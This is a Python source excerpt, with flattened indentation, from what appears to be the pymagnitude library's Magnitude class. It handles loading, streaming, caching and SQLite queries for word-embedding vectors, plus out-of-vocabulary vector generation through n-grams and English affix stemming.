SQLITE_LIB = _SQLITE_LIB
APSW_LIB = _APSW_LIB
NGRAM_BEG = 1
NGRAM_END = DEFAULT_NGRAM_END
BOW = BOW
EOW = EOW
RARE_CHAR = u"\uF002".encode('utf-8')
FTS_SPECIAL = set('*^')
MMAP_THREAD_LOCK = {}
OOV_RNG_LOCK = threading.Lock()
SQLITE_MAX_VARIABLE_NUMBER = max(max((_sqlite_try_max_variable_number(n)
for n in [99, 999, 9999, 99999])), 1)
MAX_KEY_LENGTH_FOR_STEM = 150
MAX_KEY_LENGTH_FOR_OOV_SIM = 1000
ENGLISH_PREFIXES = ['counter', 'electro', 'circum', 'contra', 'contro',
'crypto', 'deuter', 'franco', 'hetero', 'megalo',
'preter', 'pseudo', 'after', 'under', 'amphi',
'anglo', 'astro', 'extra', 'hydro', 'hyper', 'infra',
'inter', 'intra', 'micro', 'multi', 'ortho', 'paleo',
'photo', 'proto', 'quasi', 'retro', 'socio', 'super',
'supra', 'trans', 'ultra', 'anti', 'back', 'down',
'fore', 'hind', 'midi', 'mini', 'over', 'post',
'self', 'step', 'with', 'afro', 'ambi', 'ante',
'anti', 'arch', 'auto', 'cryo', 'demi', 'demo',
'euro', 'gyro', 'hemi', 'homo', 'hypo', 'ideo',
'idio', 'indo', 'macr', 'maxi', 'mega', 'meta',
'mono', 'mult', 'omni', 'para', 'peri', 'pleo',
'poly', 'post', 'pros', 'pyro', 'semi', 'tele',
'vice', 'dis', 'dis', 'mid', 'mis', 'off', 'out',
'pre', 'pro', 'twi', 'ana', 'apo', 'bio', 'cis',
'con', 'com', 'col', 'cor', 'dia', 'dis', 'dif',
'duo', 'eco', 'epi', 'geo', 'im ', 'iso', 'mal',
'mon', 'neo', 'non', 'pan', 'ped', 'per', 'pod',
'pre', 'pro', 'pro', 'sub', 'sup', 'sur', 'syn',
'syl', 'sym', 'tri', 'uni', 'be', 'by', 'co', 'de',
'en', 'em', 'ex', 'on', 're', 'un', 'un', 'up', 'an',
'an', 'ap', 'bi', 'co', 'de', 'di', 'di', 'du', 'en',
'el', 'em', 'ep', 'ex', 'in', 'in', 'il', 'ir', 'sy',
'a', 'a', 'a']
ENGLISH_PREFIXES = sorted(
chain.from_iterable([(p + '-', p) for p in ENGLISH_PREFIXES]),
key=lambda x: len(x), reverse=True)
ENGLISH_SUFFIXES = ['ification', 'ologist', 'ology', 'ology', 'able',
'ible', 'hood', 'ness', 'less', 'ment', 'tion',
'logy', 'like', 'ise', 'ize', 'ful', 'ess', 'ism',
'ist', 'ish', 'ity', 'ant', 'oid', 'ory', 'ing', 'fy',
'ly', 'al']
ENGLISH_SUFFIXES = sorted(
chain.from_iterable([('-' + s, s) for s in ENGLISH_SUFFIXES]),
key=lambda x: len(x), reverse=True)
def __new__(cls, *args, **kwargs):
""" Returns a concatenated magnitude object, if Magnitude parameters """
if len(args) > 0 and isinstance(args[0], Magnitude):
obj = object.__new__(ConcatenatedMagnitude, *args, **kwargs)
obj.__init__(*args, **kwargs)
else:
obj = object.__new__(cls)
return obj
"""A Magnitude class that interfaces with the underlying SQLite
data store to provide efficient access.
Attributes:
path: The file path or URL to the magnitude file
stream: Stream the URL instead of downloading it
stream_options: Options to control the behavior of the streaming
lazy_loading: -1 = pre-load into memory, 0 = lazy loads with unbounded
in-memory cache, >0 lazy loads with an LRU cache of that
size
blocking: Even when lazy_loading is -1, the constructor will not block
it will instead pre-load into memory in a background thread,
if blocking is set to True, it will block until everything
is pre-loaded into memory
normalized: Returns unit normalized vectors
use_numpy: Returns a NumPy array if True or a list if False
case_insensitive: Searches for keys with case-insensitive search
pad_to_length: Pads to a certain length if examples are shorter than
that length or truncates if longer than that length.
truncate_left: if something needs to be truncated to the padding,
truncate off the left side
pad_left: Pads to the left.
placeholders: Extra empty dimensions to add to the vectors.
ngram_oov: Use character n-grams for generating out-of-vocabulary
vectors.
supress_warnings: Supress warnings generated
batch_size: Controls the maximum vector size used in memory directly
eager: Start loading non-critical resources in the background in
anticipation they will be used.
language: A ISO 639-1 Language Code (default: English 'en')
dtype: The dtype to use when use_numpy is True.
devices: A list of GPU device ids.
temp_dir: The directory Magnitude will use as its temporary directory
log: Enable log messages from Magnitude
_number_of_values: When the path is set to None and Magnitude is being
used to solely featurize keys directly into vectors,
_number_of_values should be set to the
approximate upper-bound of the number of keys
that will be looked up with query(). If you don't know
the exact number, be conservative and pick a large
number, while keeping in mind the bigger
_number_of_values is, the more memory it will consume.
_namespace: an optional namespace that will be prepended to each query
if provided
"""
def __init__(self, path, stream=False, stream_options=None,
lazy_loading=0, blocking=False, normalized=None,
use_numpy=True, case_insensitive=False,
pad_to_length=None, truncate_left=False,
pad_left=False, placeholders=0, ngram_oov=None,
supress_warnings=False, batch_size=3000000,
eager=None, language='en', dtype=np.float32,
devices=[], temp_dir=tempfile.gettempdir(),
log=None, _namespace=None,
_number_of_values=1000000):
"""Initializes a new Magnitude object."""
self.sqlite_lib = Magnitude.SQLITE_LIB
self.apsw_lib = Magnitude.APSW_LIB
self.closed = False
self.uid = str(uuid.uuid4()).replace("-", "")
self.stream = stream
self.stream_options = stream_options or {}
if self.stream:
if self.apsw_lib != 'internal':
raise RuntimeError(
"""You are trying to stream a model, but the
installation of Magnitude has partially failed so this
component will not work. Please try re-installing or create
a GitHub issue to further debug.""")
self.driver = apsw
self.http_vfs = HTTPVFS(options=self.stream_options)
download_vfs_options = deepcopy(self.stream_options)
download_vfs_options.update({
'sequential_cache_max_read': 500 * (1024 ** 2),
})
self.http_download_vfs = HTTPVFS(vfsname='http_download',
options=download_vfs_options)
else:
self.driver = sqlite3
self.fd = None
if path is None:
self.memory_db = True
self.path = ":memory:"
else:
self.memory_db = False
self.path = (
os.path.expanduser(path)
if not self.stream else MagnitudeUtils.download_model(
path, _download=False, _local=True))
self._all_conns = []
self.lazy_loading = lazy_loading
self.use_numpy = use_numpy
self.case_insensitive = case_insensitive
self.pad_to_length = pad_to_length
self.truncate_left = truncate_left
self.pad_left = pad_left
self.placeholders = placeholders
self.supress_warnings = supress_warnings
self.batch_size = batch_size
if eager is None:
self.eager = not(self.stream)
else:
self.eager = eager
self.language = language and language.lower()
self.dtype = dtype
if isinstance(devices, list):
self.devices = devices
else:
self.devices = [devices]
self.temp_dir = temp_dir
if log is None:
self.log = True if self.stream else log
else:
self.log = log
self._namespace = _namespace
self._number_of_values = _number_of_values
# Define conns and cursors store
self._conns = {}
self._cursors = {}
self._threads = []
# Convert the input file if not .magnitude
if self.path.endswith('.bin') or \
self.path.endswith('.txt') or \
self.path.endswith('.vec') or \
self.path.endswith('.hdf5'):
if not supress_warnings:
sys.stdout.write(
"""WARNING: You are attempting to directly use a `.bin`,
`.txt`, `.vec`, or `.hdf5` file with Magnitude. The file is being
converted to the `.magnitude` format (which is slow) so
that it can be used with this library. This will happen on
every run / re-boot of your computer. If you want to make
this faster pre-convert your vector model to the
`.magnitude` format with the built-in command utility:
`python -m pymagnitude.converter -i input_file -o output_file`
Refer to the README for more information.
You can pass `supress_warnings=True` to the constructor to
hide this message.""") # noqa
sys.stdout.flush()
from pymagnitude.converter_shared import convert as convert_vector_file # noqa
self.path = convert_vector_file(self.path)
# If the path doesn't exist locally, try a remote download
if not self.stream and not os.path.isfile(
self.path) and not self.memory_db:
self.path = MagnitudeUtils.download_model(
self.path, log=self.log, _local=True)
# Open a read-only file descriptor against the file
if not self.memory_db and not self.stream:
self.fd = os.open(self.path, os.O_RDONLY)
# Get metadata about the vectors
self.length = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='size'") \
.fetchall()[0][0]
version_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='version'") \
.fetchall()
self.version = version_query[0][0] if len(version_query) > 0 else 1
elmo_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='elmo'") \
.fetchall()
self.elmo = len(elmo_query) > 0 and elmo_query[0][0]
if ngram_oov is None:
self.ngram_oov = not(self._is_lm())
else:
self.ngram_oov = ngram_oov
if normalized is None:
self.normalized = not(self._is_lm())
else:
self.normalized = normalized
if not self.normalized:
try:
self._db().execute(
"SELECT magnitude FROM magnitude LIMIT 1")\
.fetchall()
except BaseException:
raise RuntimeError(
"""You are trying to access non-unit-normalized vectors.
However, your .magnitude file version does not support
this. Please re-download a newer .magnitude file for
this model or re-convert it if it is a custom model.""")
if CONVERTER_VERSION < self.version:
raise RuntimeError(
"""The `.magnitude` file you are using was built with a
newer version of Magnitude than your version of Magnitude.
Please update the Magnitude library as it is incompatible
with this particular `.magnitude` file.""") # noqa
self.emb_dim = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='dim'") \
.fetchall()[0][0]
self.precision = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='precision'") \
.fetchall()[0][0]
subword_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword'") \
.fetchall()
self.subword = len(subword_query) > 0 and subword_query[0][0]
if self.subword:
self.subword_start = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword_start'")\
.fetchall()[0][0]
self.subword_end = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword_end'") \
.fetchall()[0][0]
approx_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='approx'") \
.fetchall()
self.approx = len(approx_query) > 0 and approx_query[0][0]
if self.approx:
self.approx_trees = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='approx_trees'")\
.fetchall()[0][0]
self.dim = self.emb_dim + self.placeholders
self.highest_entropy_dimensions = [row[0] for row in self._db().execute(
"SELECT value FROM magnitude_format WHERE key='entropy'")
.fetchall()]
duplicate_keys_query = self._db().execute(
"""SELECT value FROM magnitude_format
WHERE key='max_duplicate_keys'""").fetchall()
self.max_duplicate_keys = len(
duplicate_keys_query) > 0 and duplicate_keys_query[0][0]
if len(duplicate_keys_query) == 0:
duplicate_keys_query = self._db().execute("""
SELECT MAX(key_count)
FROM (
SELECT COUNT(key)
AS key_count
FROM magnitude
GROUP BY key
);
""").fetchall()
self.max_duplicate_keys = (
duplicate_keys_query[0][0] if duplicate_keys_query[0][0] is not None else 1) # noqa
# Iterate to pre-load
def _preload_memory():
if not self.eager: # So that it doesn't loop over the vectors twice
for key, vector in self._iter(put_cache=True, downloader=True):
pass
# Start creating mmap in background
self.setup_for_mmap = False
self._all_vectors = None
self._approx_index = None
self._elmo_embedder = None
if self.eager:
mmap_thread = threading.Thread(target=self.get_vectors_mmap,
args=(False,))
self._threads.append(mmap_thread)
mmap_thread.daemon = True
mmap_thread.start()
if self.approx:
approx_mmap_thread = threading.Thread(
target=self.get_approx_index, args=(False,))
self._threads.append(approx_mmap_thread)
approx_mmap_thread.daemon = True
approx_mmap_thread.start()
if self.elmo:
elmo_thread = threading.Thread(
target=self.get_elmo_embedder, args=(False,))
self._threads.append(elmo_thread)
elmo_thread.daemon = True
elmo_thread.start()
# Create cached methods
if self.lazy_loading <= 0:
@lru_cache(None, real_func=self._vector_for_key, remove_self=True)
def _vector_for_key_cached(*args, **kwargs):
return self._vector_for_key(*args, **kwargs)
@lru_cache(
None,
real_func=self._out_of_vocab_vector,
remove_self=True)
def _out_of_vocab_vector_cached(*args, **kwargs):
return self._out_of_vocab_vector(*args, **kwargs)
@lru_cache(None, real_func=self._key_for_index, remove_self=True)
def _key_for_index_cached(*args, **kwargs):
return self._key_for_index(*args, **kwargs)
self._vector_for_key_cached = _vector_for_key_cached
self._out_of_vocab_vector_cached = _out_of_vocab_vector_cached
self._key_for_index_cached = _key_for_index_cached
if self.lazy_loading == -1:
if blocking:
_preload_memory()
else:
preload_thread = threading.Thread(target=_preload_memory)
self._threads.append(preload_thread)
preload_thread.daemon = True
preload_thread.start()
elif self.lazy_loading > 0:
@lru_cache(
self.lazy_loading,
real_func=self._vector_for_key,
remove_self=True)
def _vector_for_key_cached(*args, **kwargs):
return self._vector_for_key(*args, **kwargs)
@lru_cache(
self.lazy_loading,
real_func=self._out_of_vocab_vector,
remove_self=True)
def _out_of_vocab_vector_cached(*args, **kwargs):
return self._out_of_vocab_vector(*args, **kwargs)
@lru_cache(
self.lazy_loading,
real_func=self._key_for_index,
remove_self=True)
def _key_for_index_cached(*args, **kwargs):
return self._key_for_index(*args, **kwargs)
self._vector_for_key_cached = _vector_for_key_cached
self._out_of_vocab_vector_cached = _out_of_vocab_vector_cached
self._key_for_index_cached = _key_for_index_cached
if self.eager and blocking:
self.get_vectors_mmap() # Wait for mmap to be available
if self.approx:
self.get_approx_index() # Wait for approx mmap to be available
if self.elmo:
self.get_elmo_embedder() # Wait for approx mmap to be available
def _setup_for_mmap(self):
# Setup variables for get_vectors_mmap()
self._all_vectors = None
self._approx_index = None
self._elmo_embedder = None
if not self.memory_db:
self.db_hash = fast_md5_file(self.path, stream=self.stream)
else:
self.db_hash = self.uid
self.md5 = hashlib.md5(",".join(
[self.path, self.db_hash, str(self.length),
str(self.dim), str(self.precision), str(self.case_insensitive)
]).encode('utf-8')).hexdigest()
self.path_to_mmap = os.path.join(self.temp_dir,
self.md5 + '.magmmap')
self.path_to_approx_mmap = os.path.join(self.temp_dir,
self.md5 + '.approx.magmmap')
self.path_to_elmo_w_mmap = os.path.join(self.temp_dir,
self.md5 + '.elmo.hdf5.magmmap')
self.path_to_elmo_o_mmap = os.path.join(self.temp_dir,
self.md5 + '.elmo.json.magmmap')
if self.path_to_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_mmap] = threading.Lock()
if self.path_to_approx_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_approx_mmap] = \
threading.Lock()
if self.path_to_elmo_w_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_w_mmap] = \
threading.Lock()
if self.path_to_elmo_o_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_o_mmap] = \
threading.Lock()
self.MMAP_THREAD_LOCK = Magnitude.MMAP_THREAD_LOCK[self.path_to_mmap]
self.MMAP_PROCESS_LOCK = InterProcessLock(self.path_to_mmap + '.lock')
self.APPROX_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_approx_mmap]
self.APPROX_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_approx_mmap + '.lock')
self.ELMO_W_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_w_mmap]
self.ELMO_W_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_elmo_w_mmap + '.lock')
self.ELMO_O_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_o_mmap]
self.ELMO_O_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_elmo_o_mmap + '.lock')
self.setup_for_mmap = True
def sqlite3_connect(self, downloader, *args, **kwargs):
"""Returns a sqlite3 connection."""
if (self.driver != sqlite3):
if 'check_same_thread' in kwargs:
del kwargs['check_same_thread']
if self.stream:
if downloader:
kwargs['vfs'] = self.http_download_vfs.vfsname
else:
kwargs['vfs'] = self.http_vfs.vfsname
kwargs['flags'] = self.driver.SQLITE_OPEN_READONLY
return self.driver.Connection(*args, **kwargs)
else:
return self.driver.connect(*args, **kwargs)
def _db(self, force_new=False, downloader=False):
"""Returns a cursor to the database. Each thread gets its
own cursor.
"""
identifier = threading.current_thread().ident
conn_exists = identifier in self._cursors
if not conn_exists or force_new:
if self.fd:
if os.name == 'nt':
conn = self.sqlite3_connect(downloader, self.path,
check_same_thread=False)
else:
conn = self.sqlite3_connect(downloader,
'/dev/fd/%d' % self.fd,
check_same_thread=False)
elif self.stream:
conn = self.sqlite3_connect(downloader,
self.path, check_same_thread=False)
else:
conn = self.sqlite3_connect(downloader,
self.path, check_same_thread=False)
self._create_empty_db(conn.cursor())
self._all_conns.append(conn)
if not conn_exists:
self._conns[identifier] = conn
self._cursors[identifier] = conn.cursor()
elif force_new:
return conn.cursor()
return self._cursors[identifier]
def _create_empty_db(self, db):
# Calculates the number of dimensions needed to prevent hashing from
# creating a collision error of a certain value for the number of
# expected feature values being hashed
collision_error_allowed = .001
number_of_dims = max(math.ceil(math.log(
((self._number_of_values ** 2) / (-2 * math.log(-collision_error_allowed + 1))), 100)), 2) # noqa
db.execute("DROP TABLE IF EXISTS `magnitude`;")
db.execute("""
CREATE TABLE `magnitude` (
key TEXT COLLATE NOCASE,
magnitude REAL
);
""")
db.execute("""
CREATE TABLE `magnitude_format` (
key TEXT COLLATE NOCASE,
value INTEGER
);
""")
insert_format_query = """
INSERT INTO `magnitude_format`(
key,
value
)
VALUES (
?, ?
);
"""
db.execute(insert_format_query, ('size', 0))
db.execute(insert_format_query, ('dim', number_of_dims))
db.execute(insert_format_query, ('precision', 0))
def _padding_vector(self):
"""Generates a padding vector."""
if self.use_numpy:
return np.zeros((self.dim,), dtype=self.dtype)
else:
return [0.0] * self.dim
def _key_t(self, key):
"""Transforms a key to lower case depending on case
sensitivity.
"""
if self.case_insensitive and (isinstance(key, str) or
isinstance(key, unicode)):
return key.lower()
return key
def _string_dist(self, a, b):
length = max(len(a), len(b))
return length - difflib.SequenceMatcher(None, a, b).ratio() * length
def _key_shrunk_2(self, key):
"""Shrinks more than two characters to two characters
"""
return re.sub(r"([^<])\1{2,}", r"\1\1", key)
def _key_shrunk_1(self, key):
"""Shrinks more than one character to a single character
"""
return re.sub(r"([^<])\1+", r"\1", key)
def _oov_key_t(self, key):
"""Transforms a key for out-of-vocabulary lookup.
"""
is_str = isinstance(key, str) or isinstance(key, unicode)
if is_str:
key = Magnitude.BOW + self._key_t(key) + Magnitude.EOW
return is_str, self._key_shrunk_2(key)
return is_str, key
def _oov_english_stem_english_ixes(self, key):
"""Strips away common English prefixes and suffixes."""
key_lower = key.lower()
start_idx = 0
end_idx = 0
for p in Magnitude.ENGLISH_PREFIXES:
if key_lower[:len(p)] == p:
start_idx = len(p)
break
for s in Magnitude.ENGLISH_SUFFIXES:
if key_lower[-len(s):] == s:
end_idx = len(s)
break
start_idx = start_idx if max(start_idx, end_idx) == start_idx else 0
end_idx = end_idx if max(start_idx, end_idx) == end_idx else 0
stripped_key = key[start_idx:len(key) - end_idx]
if len(stripped_key) < 4:
return key
elif stripped_key != key:
return self._oov_english_stem_english_ixes(stripped_key)
else:
return stripped_key
def _oov_stem(self, key):
"""Strips away common prefixes and suffixes."""
if len(key) <= Magnitude.MAX_KEY_LENGTH_FOR_STEM:
if self.language == 'en':
return self._oov_english_stem_english_ixes(key)
return key
def _db_query_similar_keys_vector(
self, key, orig_key, topn=3, normalized=None):
"""Finds similar keys in the database and gets the mean vector."""
normalized = normalized if normalized is not None else self.normalized
def _sql_escape_single(s):
return s.replace("'", "''")
def _sql_escape_fts(s):
return ''.join("\\" + c if c in Magnitude.FTS_SPECIAL
else c for c in s).replace('"', '""')
exact_search_query = """
SELECT *
FROM `magnitude`
WHERE key = ?
ORDER BY key = ? COLLATE NOCASE DESC
LIMIT ?;
"""
if self.subword and len(key) < Magnitude.MAX_KEY_LENGTH_FOR_OOV_SIM:
current_subword_start = self.subword_end
BOW_length = len(Magnitude.BOW) # noqa: N806
EOW_length = len(Magnitude.EOW) # noqa: N806
BOWEOW_length = BOW_length + EOW_length # noqa: N806
true_key_len = len(key) - BOWEOW_length
key_shrunk_stemmed = self._oov_stem(self._key_shrunk_1(orig_key))
key_shrunk = self._key_shrunk_1(orig_key)
key_stemmed = self._oov_stem(orig_key)
beginning_and_end_clause = ""
exact_matches = []
if true_key_len <= 6:
beginning_and_end_clause = """
magnitude.key LIKE '{0}%'
AND LENGTH(magnitude.key) <= {2} DESC,
magnitude.key LIKE '%{1}'
AND LENGTH(magnitude.key) <= {2} DESC,"""
beginning_and_end_clause = beginning_and_end_clause.format(
_sql_escape_single(key[BOW_length:BOW_length + 1]),
_sql_escape_single(key[-EOW_length - 1:-EOW_length]),
str(true_key_len))
if key != orig_key:
exact_matches.append((key_shrunk, self._key_shrunk_2(orig_key)))
if key_stemmed != orig_key:
exact_matches.append((key_stemmed,))
if key_shrunk_stemmed != orig_key:
exact_matches.append((key_shrunk_stemmed,))
if len(exact_matches) > 0:
for exact_match in exact_matches:
results = []
split_results = []
limits = np.array_split(list(range(topn)), len(exact_match))
for i, e in enumerate(exact_match):
limit = len(limits[i])
split_results.extend(self._db().execute(
exact_search_query, (e, e, limit)).fetchall())
results.extend(self._db().execute(
exact_search_query, (e, e, topn)).fetchall())
if len(split_results) >= topn:
results = split_results
if len(results) > 0:
break
else:
results = []
if len(results) == 0:
search_query = """
SELECT magnitude.*
FROM magnitude_subword, magnitude
WHERE char_ngrams MATCH ?
AND magnitude.rowid = magnitude_subword.rowid
ORDER BY
(
(
LENGTH(offsets(magnitude_subword)) -
LENGTH(
REPLACE(offsets(magnitude_subword), ' ', '')
)
)
+
1
) DESC,
""" + beginning_and_end_clause + """
LENGTH(magnitude.key) ASC
LIMIT ?;
""" # noqa
while (len(results) < topn and
current_subword_start >= self.subword_start):
ngrams = list(char_ngrams(
key, current_subword_start, current_subword_start))
ngram_limit_map = {
6: 4,
5: 8,
4: 12,
}
while current_subword_start in ngram_limit_map and len(
ngrams) > ngram_limit_map[current_subword_start]:
# Reduce the search parameter space by sampling every
# other ngram
ngrams = ngrams[:-1][::2] + ngrams[-1:]
params = (' OR '.join('"{0}"'.format(_sql_escape_fts(n))
for n in ngrams), topn)
results = self._db().execute(search_query,
params).fetchall()
small_typo = len(results) > 0 and self._string_dist(
results[0][0].lower(), orig_key.lower()) <= 4
if key_shrunk_stemmed != orig_key and key_shrunk_stemmed != key_shrunk and not small_typo: # noqa
ngrams = list(
char_ngrams(
self._oov_key_t(key_shrunk_stemmed)[1],
current_subword_start,
self.subword_end))
params = (' OR '.join('"{0}"'.format(_sql_escape_fts(n))
for n in ngrams), topn)
results = self._db().execute(search_query,
params).fetchall()
current_subword_start -= 1
else:
# As a backup do a search with 'NOCASE'
results = self._db().execute(exact_search_query,
(orig_key, orig_key, topn)).fetchall()
final_results = []
for result in results:
result_key, vec = self._db_full_result_to_vec(
result, normalized=normalized)
final_results.append(vec)
if len(final_results) > 0:
mean_vector = np.mean(final_results, axis=0)
return mean_vector / np.linalg.norm(mean_vector)
else:
return self._padding_vector()
def _seed(self, val):
"""Returns a unique seed for val and the (optional) namespace."""
if self._namespace:
return xxhash.xxh32(
self._namespace.encode('utf-8') +
Magnitude.RARE_CHAR +
val.encode('utf-8')).intdigest()
else:
return xxhash.xxh32(val.encode('utf-8')).intdigest()
def _is_lm(self):
"""Check if using a language model"""
return self.elmo
def _process_lm_output(self, q, normalized):
"""Process the output from a language model"""
zero_d = not(isinstance(q, list))
one_d = not(zero_d) and (len(q) == 0 or not(isinstance(q[0], list)))
if self.elmo:
if zero_d:
r_val = np.concatenate(self.get_elmo_embedder().embed_batch(
[[q]])[0], axis=1).flatten()
elif one_d:
r_val = np.concatenate(self.get_elmo_embedder().embed_batch(
[q])[0], axis=1)
else:
r_val = [np.concatenate(row, axis=1)
for row in self.get_elmo_embedder().embed_batch(q)]
if normalized:
if zero_d:
r_val = r_val / np.linalg.norm(r_val)
elif one_d:
r_val = norm_matrix(r_val)
else:
r_val = [norm_matrix(row) for row in r_val]
if self.placeholders > 0 or self.ngram_oov:
shape_p = list(r_val.shape) if zero_d or one_d else \
([len(r_val)] + list(max((row.shape for row in r_val))))
shape_p[-1] = self.dim
if self.placeholders > 0:
if zero_d or one_d:
r_val_p = np.zeros(shape_p, dtype=self.dtype)
else:
r_val_p = [np.zeros(shape_p[1:], dtype=self.dtype)
for row in r_val]
else:
r_val_p = r_val
if self.ngram_oov:
if zero_d:
lookup = self._vectors_for_keys_cached(
[q], normalized=normalized, force=True)
elif one_d:
lookup = self._vectors_for_keys_cached(
q, normalized=normalized, force=True)
else:
lookup = [None] * len(q)
for row, sq in enumerate(q):
lookup[row] = self._vectors_for_keys_cached(
sq, normalized=normalized, force=True)
for idx in product(*[xrange(s) for s in shape_p[:-1]]):
if zero_d:
key = q
if self.ngram_oov:
vec = r_val if self.__contains__(key) else lookup[0]
else:
vec = r_val
r_val_p[:self.emb_dim] = vec[:self.emb_dim]
elif one_d:
key = q[idx[0]]
if self.ngram_oov:
vec = r_val[idx] if self.__contains__(key) else \
lookup[idx[0]]
else:
vec = r_val[idx]
r_val_p[idx][:self.emb_dim] = vec[:self.emb_dim]
elif idx[1] < len(q[idx[0]]):
key = q[idx[0]][idx[1]]
if self.ngram_oov:
vec = r_val[idx[0]][idx[1]] if self.__contains__(key) \
else lookup[idx[0]][idx[1]]
else:
vec = r_val[idx[0]][idx[1]]
r_val_p[idx[0]][idx[1]][:self.emb_dim] = vec[:self.emb_dim]
r_val = r_val_p
if self.use_numpy:
return r_val
else:
return r_val.tolist()
def _out_of_vocab_vector(self, key, normalized=None, force=False):
"""Generates a random vector based on the hash of the key."""
normalized = normalized if normalized is not None else self.normalized
orig_key = key
is_str, key = self._oov_key_t(key)
if self._is_lm() and is_str and not force:
return self._process_lm_output(key, normalized)
if not is_str:
seed = self._seed(type(key).__name__)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vector = np.random.uniform(-1, 1, (self.emb_dim,))
Magnitude.OOV_RNG_LOCK.release()
random_vector[-1] = self.dtype(key) / np.finfo(self.dtype).max
elif not self.ngram_oov or len(key) < Magnitude.NGRAM_BEG:
seed = self._seed(key)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vector = np.random.uniform(-1, 1, (self.emb_dim,))
Magnitude.OOV_RNG_LOCK.release()
else:
ngrams = char_ngrams(key, Magnitude.NGRAM_BEG,
Magnitude.NGRAM_END)
random_vectors = []
for i, ngram in enumerate(ngrams):
seed = self._seed(ngram)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vectors.append(
np.random.uniform(-1, 1, (self.emb_dim,)))
Magnitude.OOV_RNG_LOCK.release()
random_vector = np.mean(random_vectors, axis=0)
np.random.seed()
if self.placeholders > 0:
random_vector = np.pad(random_vector, [(0, self.placeholders)],
mode='constant', constant_values=0.0)
if is_str:
random_vector = random_vector / np.linalg.norm(random_vector)
final_vector = (
random_vector *
0.3 +
self._db_query_similar_keys_vector(
key,
orig_key,
normalized=normalized) *
0.7)
if normalized:
final_vector = final_vector / np.linalg.norm(final_vector)
else:
final_vector = random_vector
if self.use_numpy:
return final_vector
else:
return final_vector.tolist()
def _db_batch_generator(self, params):
""" Generates batches of paramaters that respect
SQLite's MAX_VARIABLE_NUMBER """
if len(params) <= Magnitude.SQLITE_MAX_VARIABLE_NUMBER:
yield params
else:
it = iter(params)
for batch in \
iter(lambda: tuple(
islice(it, Magnitude.SQLITE_MAX_VARIABLE_NUMBER)
), ()):
yield batch
def _db_result_to_vec(self, result, normalized=None):
"""Converts a database result to a vector."""
normalized = normalized if normalized is not None else self.normalized
if self.use_numpy:
vec = np.zeros((self.dim,), dtype=self.dtype)
vec[0:self.emb_dim] = result[0:self.emb_dim]
if normalized:
rv = vec / float(10**self.precision)
else:
rv = vec * (float(result[-1]) / float(10**self.precision))
else:
if normalized:
rv = [v / float(10**self.precision)
for v in islice(result, self.emb_dim)] + \
[0.0] * self.placeholders
else:
rv = [v * (float(result[-1]) / float(10**self.precision))
for v in islice(result, self.emb_dim)] + \
[0.0] * self.placeholders
return rv
def _db_full_result_to_vec(self, result, put_cache=True, normalized=None):
"""Converts a full database result to a vector."""
normalized = normalized if normalized is not None else self.normalized
result_key = result[0]
vec = self._db_result_to_vec(result[1:], normalized)
if put_cache:
self._vector_for_key_cached._cache.put(
((result_key,), frozenset([('normalized', normalized)])), vec)
return (result_key, vec)
def _vector_for_key(self, key, normalized=None):
"""Queries the database for a single key."""
normalized = normalized if normalized is not None else self.normalized
result = self._db().execute(
"""
SELECT *
FROM `magnitude`
WHERE key = ?
ORDER BY key = ? COLLATE BINARY DESC
LIMIT 1;""",
(key, key)).fetchone()
if result is None or self._key_t(result[0]) != self._key_t(key):
return None
else:
return self._db_result_to_vec(result[1:], normalized)
def _vectors_for_keys_cached(self, keys, normalized=None, force=False):
"""Queries the database for multiple keys."""
normalized = normalized if normalized is not None else self.normalized
if self._is_lm() and not force:
keys = [self._key_t(key) for key in keys]
return self._process_lm_output(keys, normalized)
cached_vectors = {key: self._query_cached(key, normalized, force) for key in keys}
unseen_keys = tuple(
key for key in keys if cached_vectors[key] is None)
unseen_keys_map = {}
if len(unseen_keys) > 0:
unseen_keys_map = {self._key_t(k): i for i, k in
enumerate(unseen_keys)}
unseen_vectors = [None] * len(unseen_keys)
seen_keys = set()
for unseen_keys_batch in self._db_batch_generator(unseen_keys):
results = self._db().execute(
"""
SELECT *
FROM `magnitude`
WHERE key
IN (""" + ' ,'.join(['?'] * len(unseen_keys_batch)) +
""");
""",
unseen_keys_batch)
for result in results:
result_key, vec = self._db_full_result_to_vec(
result, normalized=normalized)
result_key_t = self._key_t(result_key)
if result_key_t in unseen_keys_map:
i = unseen_keys_map[result_key_t]
if (
(result_key_t not in seen_keys or
result_key == unseen_keys[i]) and
(
self.case_insensitive or
result_key == unseen_keys[i])
):
seen_keys.add(result_key_t)
unseen_vectors[i] = vec
for i in range(len(unseen_vectors)):
self._vector_for_key_cached._cache.put(
((unseen_keys[i],), frozenset([('normalized', normalized)])), # noqa
unseen_vectors[i])
if unseen_vectors[i] is None:
unseen_vectors[i] = self._out_of_vocab_vector_cached(
unseen_keys[i], normalized=normalized, force=force)
vectors = [cached_vectors[key]
if key not in unseen_keys_map else
unseen_vectors[unseen_keys_map[self._key_t(key)]]
for key in keys]
return vectors
